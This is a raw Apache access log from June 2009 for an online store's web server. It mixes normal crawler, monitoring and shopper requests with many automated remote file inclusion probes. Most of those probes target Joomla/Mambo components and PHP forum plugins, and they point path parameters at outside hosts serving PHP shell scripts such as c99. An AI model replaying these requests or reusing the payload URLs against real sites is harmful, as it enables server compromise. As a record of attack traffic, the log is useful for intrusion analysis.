66.249.71.204 - - [28/Jun/2009:00:01:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0193DE4F3D531700D4B0001+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jun/2009:00:04:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.38.188.128 - - [28/Jun/2009:00:04:18 -0400] "GET //components/com_artforms/artforms.html.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
74.203.196.99 - - [28/Jun/2009:00:05:05 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.819"
74.203.196.99 - - [28/Jun/2009:00:05:05 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.819"
74.203.196.99 - - [28/Jun/2009:00:05:05 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.819"
74.203.196.99 - - [28/Jun/2009:00:05:05 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.819"
74.203.196.99 - - [28/Jun/2009:00:05:05 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.819"
74.203.196.99 - - [28/Jun/2009:00:05:05 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.819"
216.75.60.116 - - [28/Jun/2009:00:06:24 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:00:06:24 -0400] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:00:06:24 -0400] "GET /logs/access_log.Q109053100%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
78.110.50.132 - - [28/Jun/2009:00:06:26 -0400] "GET /logs/access_log.Q109051200//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/sistem.jpg??? HTTP/1.1" 404 267 "-" "libwww-perl/5.814"
74.203.196.99 - - [28/Jun/2009:00:06:26 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.819"
74.203.196.99 - - [28/Jun/2009:00:06:26 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.819"
216.75.60.116 - - [28/Jun/2009:00:06:27 -0400] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:00:06:27 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:00:06:27 -0400] "GET /logs/access_log.Q109053100%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:00:07:23 -0400] "GET /logs/access_log.Q109053100/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:00:07:26 -0400] "GET /logs/access_log.Q109053100/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:00:08:39 -0400] "GET /logs/error_log.Q108111100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jun/2009:00:09:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.16 - - [28/Jun/2009:00:09:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0193DE4F3CD30700D4B0001+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.74.143.62 - - [28/Jun/2009:00:11:43 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sekip-technology.net/Source/c99? HTTP/1.0" 404 280 "-" "libwww-perl/5.805"
200.74.143.62 - - [28/Jun/2009:00:11:43 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sekip-technology.net/Source/c99? HTTP/1.0" 404 253 "-" "libwww-perl/5.805"
200.74.143.62 - - [28/Jun/2009:00:11:43 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sekip-technology.net/Source/c99? HTTP/1.0" 404 258 "-" "libwww-perl/5.805"
200.74.143.62 - - [28/Jun/2009:00:11:48 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sekip-technology.net/Source/c99? HTTP/1.0" 404 280 "-" "libwww-perl/5.805"
66.249.71.16 - - [28/Jun/2009:00:12:32 -0400] "GET /images/items/682437_full.jpg HTTP/1.1" 200 7369 "-" "Googlebot-Image/1.0"
200.74.143.62 - - [28/Jun/2009:00:14:10 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sekip-technology.net/Source/c99? HTTP/1.0" 404 253 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jun/2009:00:14:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.13.191.186 - - [28/Jun/2009:00:14:28 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:14:28 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:14:28 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:14:31 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:14:31 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:14:31 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:16:54 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:17:00 -0400] "GET //skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:17:00 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:17:00 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
208.38.188.128 - - [28/Jun/2009:00:17:01 -0400] "GET /logs/access_log.Q109060300//components/com_artforms/artforms.html.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.810"
208.38.188.128 - - [28/Jun/2009:00:17:01 -0400] "GET //components/com_artforms/artforms.html.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
208.38.188.128 - - [28/Jun/2009:00:17:01 -0400] "GET /logs//components/com_artforms/artforms.html.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
83.13.191.186 - - [28/Jun/2009:00:17:05 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:17:29 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:17:38 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:17:38 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:17:38 -0400] "GET //skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:17:54 -0400] "GET /logs/access_log.Q109053000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:18:00 -0400] "GET /logs/access_log.Q109053000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:18:02 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.38.188.128 - - [28/Jun/2009:00:18:45 -0400] "GET /logs/access_log.Q109051600//components/com_artforms/artforms.html.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.810"
131.203.76.246 - - [28/Jun/2009:00:19:03 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
131.203.76.246 - - [28/Jun/2009:00:19:03 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
131.203.76.246 - - [28/Jun/2009:00:19:03 -0400] "GET /logs/access_log.Q109061600%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:00:19:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [28/Jun/2009:00:19:18 -0400] "GET /index2.php?x=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:19:19 -0400] "GET /logs/index2.php?x=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:19:19 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
131.203.76.246 - - [28/Jun/2009:00:19:23 -0400] "GET /logs/access_log.Q109051100%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:20:09 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:00:20:26 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:21:19 -0400] "GET /index2.php?x=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:21:19 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:21:19 -0400] "GET /logs/index2.php?x=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:00:24:08 -0400] "GET //?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:00:24:09 -0400] "GET /logs//?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 7319 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:00:24:10 -0400] "GET /logs/access_log.Q109060900//?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:00:24:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [28/Jun/2009:00:24:15 -0400] "GET //?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:00:24:15 -0400] "GET /logs/access_log.Q109060900//?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:00:24:15 -0400] "GET /logs//?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 7319 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:00:24:26 -0400] "GET //?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:00:24:26 -0400] "GET /logs//?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 7319 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:00:24:26 -0400] "GET /logs/access_log.Q109060900//?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:25:33 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:25:33 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:25:44 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:00:25:44 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
195.244.235.254 - - [28/Jun/2009:00:26:35 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.244.235.254 - - [28/Jun/2009:00:26:35 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
195.244.235.254 - - [28/Jun/2009:00:26:35 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.244.235.254 - - [28/Jun/2009:00:26:36 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
89.16.176.26 - - [28/Jun/2009:00:26:42 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.16.176.26 - - [28/Jun/2009:00:26:42 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
190.210.64.49 - - [28/Jun/2009:00:27:00 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
190.210.64.49 - - [28/Jun/2009:00:27:00 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
190.210.64.49 - - [28/Jun/2009:00:27:00 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
190.210.64.49 - - [28/Jun/2009:00:27:00 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:00:27:06 -0400] "GET /logs/error_log.Q108011800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.232.104.231 - - [28/Jun/2009:00:27:16 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.232.104.231 - - [28/Jun/2009:00:27:17 -0400] "GET /errors.php?error=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.232.104.231 - - [28/Jun/2009:00:27:18 -0400] "GET /logs/errors.php?error=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
89.16.176.26 - - [28/Jun/2009:00:27:57 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
89.16.176.26 - - [28/Jun/2009:00:27:57 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
192.117.165.217 - - [28/Jun/2009:00:28:28 -0400] "GET /promo.htm HTTP/1.1" 301 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:28 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 109645 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:28 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45922 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:30 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:30 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:30 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:30 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:31 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:31 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:31 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:31 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:31 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:31 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:32 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:32 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:32 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:32 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:33 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:33 -0400] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 200 2069 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
192.117.165.217 - - [28/Jun/2009:00:28:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mailinfo [621016]; .NET CLR 1.1.4322)"
